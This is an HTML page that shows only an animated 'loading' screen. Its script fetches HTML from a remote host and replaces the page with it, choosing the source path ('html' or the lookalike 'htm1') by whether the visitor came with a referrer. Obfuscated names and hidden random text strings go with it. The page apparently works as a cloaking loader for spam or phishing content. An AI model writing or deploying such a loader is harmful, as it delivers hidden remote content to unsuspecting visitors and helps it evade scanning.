<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .tQkKKQ6w {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .tQkKKQ6w .C8LHL6m {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .tQkKKQ6w .content {
            line-height: 50px;
            text-align: center
        }

        .tQkKKQ6w .img {
            width: 100%
        }

        .tQkKKQ6w .VbNIF83V {
            text-align: center
        }

        .tQkKKQ6w .VbNIF83V span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .tQkKKQ6w .VbNIF83V span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .tQkKKQ6w .VbNIF83V span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .tQkKKQ6w .VbNIF83V span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .tQkKKQ6w .VbNIF83V span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .tQkKKQ6w .VbNIF83V span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .tQkKKQ6w .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function HO4vmu4JGhT(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var kQ5Ye4c = HO4vmu4JGhT('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ kQ5Ye4c +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ kQ5Ye4c +".html?a=share";
		}
		
        ysBSZE=url+"#"+new Date().getTime();
        ysBSZE && function() {
            $.get(ysBSZE, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>Av2FSPoMgw75wu80Zc5msYj7Lo48c2UiRpsY</span>
<h1 style='display:none' >ZDGKWqXBh6Md70f5vOq9suGlpzfPU10e3W8f8URNOnkCfxG3C29qENXa3Plcu9</h1>
<span style='display:none'>Av2FSPoMgw75wu80Zc5msYj7Lo48c2UiRpsY</span><div class="tQkKKQ6w">
    <div class="C8LHL6m">
        <div class="VbNIF83V">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>iTBbkywBSR8kvaW21</div>
<h1 style='display:none' >MsiIIfX1Wxn1XMMqTLg9jYbNjvxbTqjnLJLSHzE76dgzs5qaFkykMym2m</h1>
<div style='display:none'>iTBbkywBSR8kvaW21</div>
<img  src='' style='display:none'>
<p  style='display:none'>KWbcMPExacTxCXWlfNW6EpzFcr</p>
<div style='display:none'>iTBbkywBSR8kvaW21</div></body>
</html>